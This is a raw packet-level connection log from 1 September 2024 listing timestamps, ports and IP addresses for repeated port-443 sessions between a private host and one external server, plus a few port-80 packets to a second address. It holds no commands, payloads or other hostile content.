Sep 1, 2024 22:03:46.266483068 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:46.266494989 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:46.394725084 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:46.394794941 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:46.394855022 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:46.395296097 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.631124020 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.631189108 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:05.631341934 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.631678104 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.631695986 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:05.637765884 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.637809038 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:05.637984037 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.638232946 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:05.638246059 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.238327980 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.244525909 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.247926950 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.247952938 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.249514103 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.249543905 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.361968040 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.378671885 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.399161100 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.399178028 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.399405003 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.399415016 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.522290945 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.522366047 CEST	443	49722	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.522507906 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.539752960 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.539813042 CEST	443	49723	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.539977074 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.618603945 CEST	49723	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.619340897 CEST	49722	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.620074034 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.620096922 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:06.620168924 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.621480942 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:06.621490002 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.389703989 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.391439915 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.391477108 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.501656055 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502049923 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502083063 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502193928 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502209902 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502222061 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502229929 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502284050 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502296925 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502326012 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502357960 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502443075 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502451897 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502521992 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502532005 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.502547026 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.502558947 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.723926067 CEST	49715	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:04:07.731462955 CEST	80	49715	193.122.6.168	192.168.2.5
Sep 1, 2024 22:04:07.731595993 CEST	49715	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:04:07.821521044 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.821598053 CEST	443	49724	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:07.821654081 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:07.822007895 CEST	49724	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.273838997 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.273873091 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.274028063 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.274200916 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.274213076 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.332366943 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.332396984 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.332587957 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.333235025 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.333249092 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.716111898 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.718075037 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.718097925 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.776916981 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.778465986 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.778486013 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.847040892 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.847240925 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.847253084 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.913307905 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.913578987 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.913606882 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.913752079 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.913767099 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.913778067 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.913785934 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.913820028 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.913826942 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.913919926 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.913944960 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.914056063 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.914067030 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.914184093 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.914195061 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.914350986 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.914361000 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.991178989 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.991278887 CEST	443	49725	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:16.991384029 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:16.991676092 CEST	49725	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:17.230231047 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:17.230303049 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:17.230667114 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:17.230683088 CEST	443	49726	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:17.230705023 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:17.230794907 CEST	49726	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.070408106 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.070471048 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.070559978 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.070919037 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.070931911 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.132419109 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.132448912 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.132536888 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.132828951 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.132843018 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.529704094 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.531562090 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.531586885 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.590683937 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.591984987 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.592005968 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.645998001 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.646182060 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.646198988 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.725572109 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.726113081 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.726139069 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.726324081 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.726329088 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.726430893 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.726444960 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.726546049 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.726557016 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.726747990 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.726758957 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.727565050 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.727580070 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.727663994 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.727674961 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.727741003 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.727750063 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.772929907 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.773003101 CEST	443	49727	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:19.773070097 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:19.773549080 CEST	49727	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.040213108 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.040237904 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.040494919 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.040780067 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.040793896 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.065453053 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.065551043 CEST	443	49728	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.065610886 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.065922976 CEST	49728	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.128437042 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.128449917 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.128570080 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.128966093 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.128978968 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.491604090 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.493294954 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.493345976 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.586831093 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.588097095 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.588108063 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.610934019 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.611448050 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.611455917 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.723814964 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.724107027 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.724131107 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.724621058 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.724641085 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.724951029 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.724977970 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.725897074 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.725914001 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.726598978 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.726649046 CEST	443	49729	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.726847887 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.726977110 CEST	49729	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.849967957 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.850009918 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:20.850214958 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.850476980 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:20.850490093 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.050224066 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.050287962 CEST	443	49730	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.050369978 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.051408052 CEST	49730	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.053199053 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.053225040 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.053298950 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.053582907 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.053596020 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.307771921 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.309369087 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.309398890 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.444062948 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.455610991 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.455637932 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.688678980 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.690269947 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.690299034 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.783828974 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.783885956 CEST	443	49731	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.783935070 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.784328938 CEST	49731	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.787971020 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.788001060 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.788063049 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.788475037 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.788490057 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.793159008 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.793633938 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.793658972 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.793868065 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.793874979 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.794035912 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.794049978 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.794147968 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.794157028 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.794265985 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.794292927 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.794490099 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.794502974 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.794601917 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.794615030 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:21.794796944 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:21.794806957 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.124530077 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.124591112 CEST	443	49732	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.124651909 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.125135899 CEST	49732	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.141093016 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.141145945 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.141211987 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.141554117 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.141570091 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.234230042 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.235894918 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.235914946 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.359009981 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.361140013 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.361155987 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.489507914 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.489559889 CEST	443	49733	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.489677906 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.491281986 CEST	49733	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.491312981 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.491363049 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.491554976 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.493119001 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.493133068 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.590647936 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.592823982 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.592859983 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.706163883 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.706428051 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.706449986 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.834749937 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.834789038 CEST	443	49734	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.834877968 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.840990067 CEST	49734	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.842500925 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.842550039 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:22.842879057 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.843193054 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:22.843213081 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.022052050 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.026478052 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.026496887 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.156461954 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.156757116 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.156766891 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.288575888 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.288636923 CEST	443	49735	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.288924932 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.289119005 CEST	49735	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.291533947 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.291573048 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.291644096 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.291958094 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.291965961 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.315896034 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.317744970 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.317761898 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.454718113 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455112934 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455138922 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455185890 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455192089 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455271006 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455301046 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455400944 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455410957 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455625057 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455640078 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455746889 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455758095 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.455883980 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.455897093 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.456039906 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.456049919 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.735457897 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.737361908 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.737399101 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.814552069 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.814609051 CEST	443	49736	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.814655066 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.815022945 CEST	49736	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.819920063 CEST	49738	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.819953918 CEST	443	49738	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.820039988 CEST	49738	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.820436954 CEST	49738	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.820452929 CEST	443	49738	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.847817898 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.848068953 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.848078966 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.982681036 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.982731104 CEST	443	49737	198.185.159.177	192.168.2.5
Sep 1, 2024 22:04:23.982786894 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.983755112 CEST	49737	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:04:23.992624998 CEST	49739	443	192.168.2.5	198.185.159.177
